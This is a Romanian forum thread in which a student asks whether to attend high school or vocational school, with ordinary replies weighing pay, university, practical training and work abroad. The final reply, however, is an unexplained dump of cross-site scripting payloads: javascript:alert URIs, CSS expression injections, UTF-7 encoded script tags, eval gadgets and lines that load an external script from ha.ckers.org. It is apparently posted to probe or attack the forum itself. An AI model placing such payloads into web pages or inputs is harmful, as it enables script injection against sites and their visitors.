Întrebare recomandată | Lukasssz a întrebat:

Hey TPU, "ce merita" sa faci mai nou in Romania, liceul sau scoala profesionala? Vreau argumente pro si contra la fiecare.

17 răspunsuri:
sadrian46
| sadrian46 a răspuns:

Nicu una nici alta. Inveți engleză și faci ceva pe Internet.

| GeorgeMarian1324 a răspuns (pentru sadrian46):

Cum ar fi? Poți da câteva exemple, link-uri te rog?

| Wr3nch a răspuns:

Depinde ce vrei sa faci mai departe. Vrei o meserie cat mai repede? Profesionala. Vrei faculta si implicit sanse la pozitii mai bine platite in unele cazuri

| OldSoul a răspuns:

Daca vrei sa faci o facultate, faci liceu, clar.
Daca vrei doar sa ai o meserie, faci o profesionala, te va ajuta mai mult decat daca ai face liceul. Sau cel putin, teoretic, ar trebui sa te ajute.

| Vântulalb a răspuns:

Multi fac o facultate si pleaca la cules capsuni sau la ingrijit batrani.
Cu o meserie vei castiga mai bine decat cu un liceu profil uman. Si mai ai avantajul ca dupa profesionala poti continua liceul pentru diploma de bacalaureat. Dar meseria iti ramane.

| JOHNtheADVISOR a răspuns:

Facultatea de fizică, sunt șanse mari ca după absolvire să devii președinte. laughing De stat. rolling on the floor

| Hope1992 a răspuns:

Eu te-as sfatui sa faci liceul, e mai bine pentru dezvoltarea ta in mai multe ramuri, pentru ca nu stiu cat de bine stii ce iti doresti sa faci in viata de pe acum si mai bine nu sari o etapa importanta. Asta daca poti si ai conditiile necesare sa inveti si crede-ma ca daca esti baiat si sa zicem ca vrei sa te faci mecanic poti sa faci si asta in timpul liber(ca o pasiune).

| Lukasssz explică (pentru Hope1992):

Sunt deja la liceu, clasa a 11 a.

| Hope1992 a răspuns (pentru Lukasssz):

Momentan eu pot sa vorbesc doar teoretic, dar crede-ma ca o facultate te va ajuta mult, mai ales daca ai sustinere financiara, ai timp sa te si distrezi sa si inveti si sa iti cladesti un viitor frumos.

| Lukasssz explică (pentru Hope1992):

Si poti sa pleci si in strainatate, pentru un trai mai bun daca faci liceu?

| Hope1992 a răspuns (pentru Lukasssz):

Asta te-am intrebat,daca ai o situatie decenta financiara e mai bine sa incerci sa te realizezi aici, peste hotare nu e asa frumos, am fost doar in vacantele mari la munca si am fost tratata ca o sclava, dar pentru bani nu ai voie sa comentezi ca te inlocuiesc imediat, mai ales daca e o meserie fara calificare unde mereu se gasesc alti oameni dornici. Nu stiu cat de mult o sa iti placa sa fii printre straini.

| Lukasssz explică (pentru Hope1992):

Am mai fost in strainatate am avut o experienta foarte frumoasa, de asta zic.Acum depinde si de tara.

| Kakarotto2016 a răspuns:

Fa o meserie care iti place tie si sa castigi multi bani de ex. IT

| EmaHouse a răspuns:

Bună!

Cred că m-a provocat cineva să-i dau răspunsuri despre sursele de bani disponibile pentru elevii/studenții români. Ok, și el spunea că nu ai ce face cu profesionala. Eu îți dau câteva idei pentru fiecare( de ce e bine și de ce nu este bine).

Pro școală profesională
primești o bursă mai mare pe parcursul studiilor
faci practică și ai multe șanse să o folosești independent
ai posibilitatea reală de a deveni freelancer în domeniul tău( doar anumite domenii și doar dacă înveți)

Contra școală profesională
salariul la 8 ore este mai mic(în unele meserii)
multe locuri de muncă sunt dificile și necesită muncă fizică
există mereu posibilitatea de a fi înlocuit cu o mașină (multe profesii promovate implică muncă repetitivă)

Tu alegi din astea...

Pro liceu
ai posibilitatea să mergi la facultate
poți accesa concursuri și programe care să te propulseze spre un parcurs profesional bine plătit (dacă îți dai interesul și te remarci, nu e de ajuns să treci pe acolo)

Contra liceu
bursa e mică
dacă nu alegi bine, nu sunt programe
facultatea devine obligatorie pentru un salariu mare

Alege și tu... sad

Cred că vă scriu un articol pe blogul meu despre asta curând. Prea mulți întrebați același lucru. În realitate, nu există o decizie corectă sau greșită. Poți câștiga bine oriunde, dacă te ții de treabă.

| Lukasssz explică (pentru EmaHouse):

Multumesc.Si daca vreau sa ma mut de la liceu (clasa a 11 a ) la profesionala cate clase mai fac?

| EmaHouse a răspuns (pentru Lukasssz):

O să mai faci un an de Liceu și poate un an de completare. Școala profesională este reglementată cu legea asta:

Art. 24 din Legea nr.1/2011>
(1) Invatamantul general obligatoriu este format din invatamantul primar si invatamantul secundar inferior.
(2) Invatamantul tehnic cuprinde clasele a XII-a si a XIII-a din invatamantul liceal, filiera tehnologica.
(3) Invatamantul profesional si tehnic este format din: invatamant profesional, invatamant tehnic si invatamant postliceal.

| zivewi a răspuns:

CLICKME CLICKME

XXX
javascript:alert(1)

alert(1)0
document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;

x
javascript:alert(1)'>">
javascript:alert(1)">
d.innerHTML=d.innerHTML

XXX
javascript:alert(1)"` `>

">

X
p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};
@import "data:,*%7bx:expression(javascript:alert(1))%7D";
XXXXXX
*[{}@import'%(css)s?]X
XXX

*{x:expression(javascript:alert(1))}

X
X with(document.getElementById("d"))innerHTML=innerHTML
X
XXX #x{font-family:foo[bar; color:green;} #y]; color:red;{}
XXX
({set/**/$($){_/**/setter=$, _=javascript:alert(1)}}).$=eval
({0:#0=eval/#0#/#0#(javascript:alert(1))})
ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x
Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
&alert&A7&(1)&R&UA;&&
¼script¾javascript:alert(1)¼/script¾
X

perl -e 'print "";' > out

+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
" SRC="">http://ha.ckers.org/xss.js">
" '' SRC="">http://ha.ckers.org/xss.js">
'" SRC="">http://ha.ckers.org/xss.js">
` SRC="">http://ha.ckers.org/xss.js">
'>" SRC="">http://ha.ckers.org/xss.js">
document.write("PT SRC="">http://ha.ckers.org/xss.js">
XSS